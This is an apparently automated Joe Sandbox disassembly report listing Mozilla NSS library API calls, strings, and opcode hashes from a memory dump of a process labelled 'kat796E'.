                                                                                • Opcode ID: 9246496dac5f6947f5c63b824266a563b9b97f25cd76b4220afc14add428f8d2
                                                                                • Instruction ID: 671b80f70d087233540608477c8edf88e46f38891bc45186b866de505eb450b5
                                                                                • Opcode Fuzzy Hash: 9246496dac5f6947f5c63b824266a563b9b97f25cd76b4220afc14add428f8d2
                                                                                • Instruction Fuzzy Hash: C3519FB1900602EFEB00DF25D885B9AB7B4FF04318F144265DC299BA61E771F8A5CBE1
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CFDAB7F,?,00000000,?), ref: 6CFD4CB4
                                                                                • EnterCriticalSection.KERNEL32(0000001C,?,6CFDAB7F,?,00000000,?), ref: 6CFD4CC8
                                                                                • TlsGetValue.KERNEL32(?,6CFDAB7F,?,00000000,?), ref: 6CFD4CE0
                                                                                • EnterCriticalSection.KERNEL32(?,?,6CFDAB7F,?,00000000,?), ref: 6CFD4CF4
                                                                                • PL_HashTableLookup.NSS3(?,?,?,6CFDAB7F,?,00000000,?), ref: 6CFD4D03
                                                                                • PR_Unlock.NSS3(?,00000000,?), ref: 6CFD4D10
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                • PR_Now.NSS3(?,00000000,?), ref: 6CFD4D26
                                                                                  • Part of subcall function 6D079DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D0C0A27), ref: 6D079DC6
                                                                                  • Part of subcall function 6D079DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D0C0A27), ref: 6D079DD1
                                                                                  • Part of subcall function 6D079DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D079DED
                                                                                • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CFD4D98
                                                                                • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CFD4DDA
                                                                                • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CFD4E02
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 4032354334-0
                                                                                • Opcode ID: 8539e5613deb90853761515eee11ba92c728ab1ab9e344f6b2bf96bc5b3fa46b
                                                                                • Instruction ID: c1326c7f2658ceed25549f9deb33f1cd2b4247086d3cecfcf35a71ae6bdde1b9
                                                                                • Opcode Fuzzy Hash: 8539e5613deb90853761515eee11ba92c728ab1ab9e344f6b2bf96bc5b3fa46b
                                                                                • Instruction Fuzzy Hash: B141A6B6A002059FEB019F24EC40B6B7BB8EF1525CF0A4170EC1987751EB31E964CBA2
                                                                                APIs
                                                                                • sqlite3_initialize.NSS3 ref: 6CF9FD18
                                                                                • sqlite3_initialize.NSS3 ref: 6CF9FD5F
                                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CF9FD89
                                                                                • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CF9FD99
                                                                                • sqlite3_free.NSS3(00000000), ref: 6CF9FE3C
                                                                                • sqlite3_free.NSS3(?), ref: 6CF9FEE3
                                                                                • sqlite3_free.NSS3(?), ref: 6CF9FEEE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                • String ID: simple
                                                                                • API String ID: 1130978851-3246079234
                                                                                • Opcode ID: be3654a46468e21531d1368d86c0c590bac33caf751a402b8d8b96fbac9061f1
                                                                                • Instruction ID: 3382a384e69c1034b5b6254537559898a910fb381d3b10d954f93651a4bf2453
                                                                                • Opcode Fuzzy Hash: be3654a46468e21531d1368d86c0c590bac33caf751a402b8d8b96fbac9061f1
                                                                                • Instruction Fuzzy Hash: 4D9190B1E012069FEF44DF55C880BAAB7B1FF85318F24C169E8199B762E731E941CB90
                                                                                APIs
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CFA5EC9
                                                                                • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CFA5EED
                                                                                Strings
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CFA5ED1
                                                                                • unable to close due to unfinalized statements or unfinished backups, xrefs: 6CFA5E64
                                                                                • API call with %s database connection pointer, xrefs: 6CFA5EC3
                                                                                • %s at line %d of [%.10s], xrefs: 6CFA5EE0
                                                                                • invalid, xrefs: 6CFA5EBE
                                                                                • misuse, xrefs: 6CFA5EDB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                • API String ID: 632333372-1982981357
                                                                                • Opcode ID: fff70fe921c310612599ed112618ab16168c03ab2fc489429e1803e52b6cb99e
                                                                                • Instruction ID: df3f804faf684574269620ba4831362c54ddaf04fa522aec20f9df6160e89f17
                                                                                • Opcode Fuzzy Hash: fff70fe921c310612599ed112618ab16168c03ab2fc489429e1803e52b6cb99e
                                                                                • Instruction Fuzzy Hash: A8819071B09E11DBEB19CFA5D888BAAF770BF45308F284259D8195BB51D730E843CB91
                                                                                APIs
                                                                                • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF8DDF9
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF8DE68
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF8DE97
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CF8DEB6
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF8DF78
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 1526119172-598938438
                                                                                • Opcode ID: 7a7da7db314224c9ebfc0675bcf6e1057f3a97b2f9d2f338309e468aedd9c500
                                                                                • Instruction ID: 7ee9fabff1698ca1110b1fc04bdaf4065f017b6c40e1bd5b25139ec02b6f8599
                                                                                • Opcode Fuzzy Hash: 7a7da7db314224c9ebfc0675bcf6e1057f3a97b2f9d2f338309e468aedd9c500
                                                                                • Instruction Fuzzy Hash: 3E81D572605302AFD714DF25C880B6B77F1BF45308F15882EE99A8BB92E731E945CB52
                                                                                APIs
                                                                                • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CFFCD08
                                                                                • PK11_DoesMechanism.NSS3(?,?), ref: 6CFFCE16
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFFD079
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                • String ID:
                                                                                • API String ID: 1351604052-0
                                                                                • Opcode ID: 2e0ec1ee4b3260cb68c0820074381fb28b288985b51b7a67b67f90d631a84f01
                                                                                • Instruction ID: 91f8a6f492d94a6cb35b054be3cce2cfdf7c1a6b731d26579a2f1abdd746b4e7
                                                                                • Opcode Fuzzy Hash: 2e0ec1ee4b3260cb68c0820074381fb28b288985b51b7a67b67f90d631a84f01
                                                                                • Instruction Fuzzy Hash: 24C18FB19002199BEB20DF24CC80BDAB7B4FF48318F1541A8D968A7751E775EE96CF90
                                                                                APIs
                                                                                • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CFF97C1,?,00000000,00000000,?,?,?,00000000,?,6CFD7F4A,00000000), ref: 6CFEDC68
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDD36
                                                                                • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDE2D
                                                                                • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDE43
                                                                                • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDE76
                                                                                • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDF32
                                                                                • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDF5F
                                                                                • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDF78
                                                                                • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDFAA
                                                                                Similarity
                                                                                • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                • String ID:
                                                                                • API String ID: 1886645929-0
                                                                                • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                • Instruction ID: 1ab13e301cee481bdd17b7f058efbb68acb33cad7e925665b997f6ab13f2975c
                                                                                • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                • Instruction Fuzzy Hash: 7481D571A06605ABFF148E59C8A83EA72D6DBEC348F20843AD959CBEE1D774C4C0C702
                                                                                APIs
                                                                                • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CFC3C76
                                                                                • CERT_DestroyCertificate.NSS3(00000000), ref: 6CFC3C94
                                                                                  • Part of subcall function 6CFB95B0: TlsGetValue.KERNEL32(00000000,?,6CFD00D2,00000000), ref: 6CFB95D2
                                                                                  • Part of subcall function 6CFB95B0: EnterCriticalSection.KERNEL32(?,?,?,6CFD00D2,00000000), ref: 6CFB95E7
                                                                                  • Part of subcall function 6CFB95B0: PR_Unlock.NSS3(?,?,?,?,6CFD00D2,00000000), ref: 6CFB9605
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6CFC3CB2
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CFC3CCA
                                                                                • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CFC3CE1
                                                                                  • Part of subcall function 6CFC3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CFDAE42), ref: 6CFC30AA
                                                                                  • Part of subcall function 6CFC3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CFC30C7
                                                                                  • Part of subcall function 6CFC3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CFC30E5
                                                                                  • Part of subcall function 6CFC3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CFC3116
                                                                                  • Part of subcall function 6CFC3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CFC312B
                                                                                  • Part of subcall function 6CFC3090: PK11_DestroyObject.NSS3(?,?), ref: 6CFC3154
                                                                                  • Part of subcall function 6CFC3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC317E
                                                                                Similarity
                                                                                • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                • String ID:
                                                                                • API String ID: 3167935723-0
                                                                                • Opcode ID: 53e2031536a55c23093e9e0d067e6a4c545ab8d22ccfb77f6b268d61d84554a2
                                                                                • Instruction ID: ebd37b75df33dddef1caa612fa171f3a2a3542097c309daf0546d767854fb792
                                                                                • Opcode Fuzzy Hash: 53e2031536a55c23093e9e0d067e6a4c545ab8d22ccfb77f6b268d61d84554a2
                                                                                • Instruction Fuzzy Hash: 6D61B5B1B00201ABEF105E65DC41FEB76B9EF04788F094028FE159B662F762D91CC7A2
                                                                                APIs
                                                                                  • Part of subcall function 6D003440: PK11_GetAllTokens.NSS3 ref: 6D003481
                                                                                  • Part of subcall function 6D003440: PR_SetError.NSS3(00000000,00000000), ref: 6D0034A3
                                                                                  • Part of subcall function 6D003440: TlsGetValue.KERNEL32 ref: 6D00352E
                                                                                  • Part of subcall function 6D003440: EnterCriticalSection.KERNEL32(?), ref: 6D003542
                                                                                  • Part of subcall function 6D003440: PR_Unlock.NSS3(?), ref: 6D00355B
                                                                                • TlsGetValue.KERNEL32 ref: 6D003D8B
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6D003D9F
                                                                                • PR_Unlock.NSS3(?), ref: 6D003DCA
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6D003DE2
                                                                                • PR_SetError.NSS3(FFFFE040,00000000), ref: 6D003E4F
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                • TlsGetValue.KERNEL32 ref: 6D003E97
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6D003EAB
                                                                                • PR_Unlock.NSS3(?), ref: 6D003ED6
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6D003EEE
                                                                                Similarity
                                                                                • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                • String ID:
                                                                                • API String ID: 2554137219-0
                                                                                • Opcode ID: 37838798ccf6e668537ecef22a550f182561a5620d9bb89b281099d1616d2d83
                                                                                • Instruction ID: 7877735a528252008c291777492f1698265fccbdd6875fad0b400e9a2760c925
                                                                                • Opcode Fuzzy Hash: 37838798ccf6e668537ecef22a550f182561a5620d9bb89b281099d1616d2d83
                                                                                • Instruction Fuzzy Hash: 20513571900601AFFB129F68EC41F6A73B4FF49314F054229DE194B262EB71E950CBD1
                                                                                APIs
                                                                                • PORT_ZAlloc_Util.NSS3(B90B38E4), ref: 6CFB2C5D
                                                                                  • Part of subcall function 6D010D30: calloc.MOZGLUE ref: 6D010D50
                                                                                  • Part of subcall function 6D010D30: TlsGetValue.KERNEL32 ref: 6D010D6D
                                                                                • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CFB2C8D
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFB2CE0
                                                                                  • Part of subcall function 6CFB2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CFB2CDA,?,00000000), ref: 6CFB2E1E
                                                                                  • Part of subcall function 6CFB2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CFB2E33
                                                                                  • Part of subcall function 6CFB2E00: TlsGetValue.KERNEL32 ref: 6CFB2E4E
                                                                                  • Part of subcall function 6CFB2E00: EnterCriticalSection.KERNEL32(?), ref: 6CFB2E5E
                                                                                  • Part of subcall function 6CFB2E00: PL_HashTableLookup.NSS3(?), ref: 6CFB2E71
                                                                                  • Part of subcall function 6CFB2E00: PL_HashTableRemove.NSS3(?), ref: 6CFB2E84
                                                                                  • Part of subcall function 6CFB2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CFB2E96
                                                                                  • Part of subcall function 6CFB2E00: PR_Unlock.NSS3 ref: 6CFB2EA9
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFB2D23
                                                                                • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CFB2D30
                                                                                • CERT_MakeCANickname.NSS3(00000001), ref: 6CFB2D3F
                                                                                • free.MOZGLUE(00000000), ref: 6CFB2D73
                                                                                • CERT_DestroyCertificate.NSS3(?), ref: 6CFB2DB8
                                                                                • free.MOZGLUE ref: 6CFB2DC8
                                                                                  • Part of subcall function 6CFB3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFB3EC2
                                                                                  • Part of subcall function 6CFB3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CFB3ED6
                                                                                  • Part of subcall function 6CFB3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CFB3EEE
                                                                                  • Part of subcall function 6CFB3E60: PR_CallOnce.NSS3(6D112AA4,6D0112D0), ref: 6CFB3F02
                                                                                  • Part of subcall function 6CFB3E60: PL_FreeArenaPool.NSS3 ref: 6CFB3F14
                                                                                  • Part of subcall function 6CFB3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFB3F27
                                                                                Similarity
                                                                                • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                • String ID:
                                                                                • API String ID: 3941837925-0
                                                                                • Opcode ID: 69e477982afb637a0faac7ba8c104fc9903b56f1fea1b2a590eb9c5e331813c9
                                                                                • Instruction ID: 7fb22d5fa3ca1ffca24272cd3aa3ddcf76359c3f9f36071d388e6f3b3d049356
                                                                                • Opcode Fuzzy Hash: 69e477982afb637a0faac7ba8c104fc9903b56f1fea1b2a590eb9c5e331813c9
                                                                                • Instruction Fuzzy Hash: 6051F172A043129BEB00DF6ADC89B5B77E5EF88348F15052CEC55A7610EB32E815CB92
                                                                                APIs
                                                                                  • Part of subcall function 6CFB40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CFB3F7F,?,00000055,?,?,6CFB1666,?,?), ref: 6CFB40D9
                                                                                  • Part of subcall function 6CFB40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CFB1666,?,?), ref: 6CFB40FC
                                                                                  • Part of subcall function 6CFB40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CFB1666,?,?), ref: 6CFB4138
                                                                                • PR_GetCurrentThread.NSS3 ref: 6CFB7CFD
                                                                                  • Part of subcall function 6D079BF0: TlsGetValue.KERNEL32(?,?,?,6D0C0A75), ref: 6D079C07
                                                                                • SECITEM_ItemsAreEqual_Util.NSS3(?,6D0D9030), ref: 6CFB7D1B
                                                                                  • Part of subcall function 6D00FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CFB1A3E,00000048,00000054), ref: 6D00FD56
                                                                                • SECITEM_ItemsAreEqual_Util.NSS3(?,6D0D9048), ref: 6CFB7D2F
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CFB7D50
                                                                                • PR_GetCurrentThread.NSS3 ref: 6CFB7D61
                                                                                • PORT_ArenaMark_Util.NSS3(?), ref: 6CFB7D7D
                                                                                • free.MOZGLUE(?), ref: 6CFB7D9C
                                                                                • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CFB7DB8
                                                                                • PR_SetError.NSS3(FFFFE023,00000000), ref: 6CFB7E19
                                                                                Similarity
                                                                                • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                • String ID:
                                                                                • API String ID: 70581797-0
                                                                                • Opcode ID: db20a2043f10a1c1e6b760483162b69380ce43b300750c88e61522c49bbd8580
                                                                                • Instruction ID: 819e458369e39383ba9984992b150a992b6d1403a41c69578b1282a6771f8730
                                                                                • Opcode Fuzzy Hash: db20a2043f10a1c1e6b760483162b69380ce43b300750c88e61522c49bbd8580
                                                                                • Instruction Fuzzy Hash: 0841F872A041199FEF009E6AAC41BAF37E4AF4839CF050126ED19BB651E730E915C7F1
                                                                                APIs
                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6D01536F,00000022,?,?,00000000,?), ref: 6D014E70
                                                                                • PORT_ZAlloc_Util.NSS3(00000000), ref: 6D014F28
                                                                                • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6D014F8E
                                                                                • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6D014FAE
                                                                                • free.MOZGLUE(?), ref: 6D014FC8
                                                                                Similarity
                                                                                • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                • String ID: %s=%c%s%c$%s=%s
                                                                                • API String ID: 2709355791-2032576422
                                                                                • Opcode ID: 5035aefcd6f4fc6b5c54cb52374bc7736565f25a9f8d137a64a42526e8f04ecc
                                                                                • Instruction ID: 89d131344b3d183a152b76b42a07f0749b98d36cd8a88cc2217d89647d6ca067
                                                                                • Opcode Fuzzy Hash: 5035aefcd6f4fc6b5c54cb52374bc7736565f25a9f8d137a64a42526e8f04ecc
                                                                                • Instruction Fuzzy Hash: D8510371A0C157ABFB01CAEA8C907FE7BF5BF4A308F584029E894A7361D725D80587A1
                                                                                APIs
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF57E27
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF57E67
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6CF57EED
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF57F2E
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _byteswap_ulongsqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 912837312-598938438
                                                                                • Opcode ID: bd42890eb6530555334c168a66c6184a9b908c15047e67d1b47b435a96b9bc93
                                                                                • Instruction ID: 7485435c45cd4b5260bb5b55199db76a71e7aa831be3491ac3fd3383d9128e7d
                                                                                • Opcode Fuzzy Hash: bd42890eb6530555334c168a66c6184a9b908c15047e67d1b47b435a96b9bc93
                                                                                • Instruction Fuzzy Hash: 1E61D175B043059FDB05CF25C880BAA77A2BF59308F5584AAEE094F752D731EC61CBA1
                                                                                APIs
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF3FD7A
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF3FD94
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF3FE3C
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF3FE83
                                                                                  • Part of subcall function 6CF3FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6CF3FEFA
                                                                                  • Part of subcall function 6CF3FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6CF3FF3B
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 1169254434-598938438
                                                                                • Opcode ID: 09c6a15f387144030d4336a77aaa440ac738e80e667ce662ea1a2c6d50b5fae8
                                                                                • Instruction ID: 176c0cbcabca6bf9ebab4d415d4474858df244bafa4f95cf0db037aab9366c9b
                                                                                • Opcode Fuzzy Hash: 09c6a15f387144030d4336a77aaa440ac738e80e667ce662ea1a2c6d50b5fae8
                                                                                • Instruction Fuzzy Hash: BC518371A002159FDB44CFA9D890BAEB7B1FF48308F1450A9D909AB792E735ED90CB91
                                                                                APIs
